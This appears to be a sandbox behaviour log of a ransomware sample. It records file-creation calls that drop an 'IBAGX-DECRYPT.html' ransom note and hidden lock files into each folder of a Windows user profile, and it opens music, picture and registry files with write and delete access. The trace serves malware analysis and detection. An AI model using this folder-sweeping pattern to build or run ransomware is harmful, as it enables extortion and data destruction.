Create C:\Users\EEBsYm5\Favorites\MSN Websites\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Favorites\MSN Websites\MSN Autos.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Favorites\MSN Websites\MSN Entertainment.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Favorites\MSN Websites\MSN Money.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Favorites\MSN Websites\MSN Sports.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Favorites\MSN Websites\MSN.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Favorites\MSN Websites\MSNBC News.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Windows Live\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Windows Live\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Windows Live\Get Windows Live.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Windows Live\Windows Live Gallery.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Windows Live\Windows Live Mail.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Favorites\Windows Live\Windows Live Spaces.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Links\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Links\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Music\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\EEBsYm5\Music\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Music\1clk8BgFbf.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\1lo1GtA8GFvRuHz.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\22MyRIDfUo1qSoC.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\5ApAoCcu2jJhVO5.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\5gVMkaJs ibQzS.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\5x-bv.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\9pAbBkcV.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\a--MFAm_t-fpxqDUSe.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\Ad2zgxFM7D4h jW.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\CvVDCQ4.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\eBVw6jtogO8G1fQLGtj7.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\etqaW8wTJ.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\FNnXsm7O.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\hAL hb0zqRl.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\I IgsIteQN.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\IDxNW.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\jNVEPWEJEyJq6sE.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\KjQXOL.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\kUjbWE9.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\L1fx0Un-X3sclNImngmu.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\lZFBHUeX4nu.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\mNs1b.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\Mq1_G_RX.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\MW23I.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\myb1sdd-QS4.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\ONx7q7EpAOg6j8q ByII.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\qcPYkin0Y3tGsT.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\qfL0fy4yD3aPZbri.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\qR8HudK2HC6.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\RXbudzWkd5d9xwtGA16l.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\r_I0tn7ofDKw0VRb.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\tLlcqTPAaClbgBB0m.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\VvcatQI4A1KfH_.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\xLoVG6.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\zdClr.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\ZIBpI.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Music\ZQOduxGBGW8SL5.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\My Documents\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\EEBsYm5\My Documents\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\NetHood\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\NetHood\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\ntuser.dat.LOG1 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\EEBsYm5\ntuser.dat.LOG1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\EEBsYm5\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\EEBsYm5\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\EEBsYm5\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\EEBsYm5\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\EEBsYm5\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\EEBsYm5\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\EEBsYm5\ntuser.ini desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\EEBsYm5\Pictures\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Pictures\ACgwvOZXASKlyQamj\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Pictures\ACgwvOZXASKlyQamj\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Pictures\ACgwvOZXASKlyQamj\NkhIDC5Kmgg_.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\ACgwvOZXASKlyQamj\VJJtBzDiYRrBpJk3 r.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\ACgwvOZXASKlyQamj\Y-fyGuSNnLyiDtmITP.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\CGotBO1gSZg.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\DT4z6UgyBbU9mK.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\fBAMY6.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\fI4XJw\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Pictures\fI4XJw\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Pictures\fI4XJw\1hgxz0LP1Cj6c6ELia.gif desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\fI4XJw\EouGYZiLKPABQOfe6izO.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\fI4XJw\liL-2aFkdyFeP8Iu.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\fI4XJw\oVNuE5Qodb.bmp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\fI4XJw\QjdaI.gif desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\fxHP2HyAX\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Pictures\fxHP2HyAX\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Pictures\fxHP2HyAX\5cDaMBp--aSZV.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\fxHP2HyAX\8gFK4sK4tmbCH c-wZHv.bmp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\jk7SZg7LN.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\jS-G\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Pictures\jS-G\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Pictures\jS-G\DSEf.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\jS-G\SFGOzroeE trxNF.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\jS-G\WSj4Brk__SjKLB\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Pictures\jS-G\WSj4Brk__SjKLB\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Pictures\jS-G\WSj4Brk__SjKLB\Gu_al_h0.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\jS-G\WSj4Brk__SjKLB\io6hmA.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\jS-G\WSj4Brk__SjKLB\KpMZTyQuuYTWlc89.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\jS-G\WSj4Brk__SjKLB\yju6YBbBBQWAoJum9O.bmp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\jS-G\Y 71Hd.gif desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\_n8q\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Pictures\_n8q\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Pictures\_n8q\4q7dnEiys2AWKFFO.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\_n8q\eREUpw9weZ u.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\_n8q\hyurBXWwCetuTWykO.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\_n8q\kijng19PrCBlk1.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\_n8q\opLEw9.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\_n8q\XsDydiAZMF6Gx.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Pictures\_n8q\ZPULn8tVRgR.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\PrintHood\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\PrintHood\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Recent\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Recent\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Saved Games\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Saved Games\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Searches\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Searches\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Searches\Everywhere.search-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\EEBsYm5\Searches\Everywhere.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\EEBsYm5\Searches\Indexed Locations.search-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\EEBsYm5\Searches\Indexed Locations.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Fn
Create C:\Users\EEBsYm5\SendTo\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\SendTo\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Start Menu\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Start Menu\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Templates\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
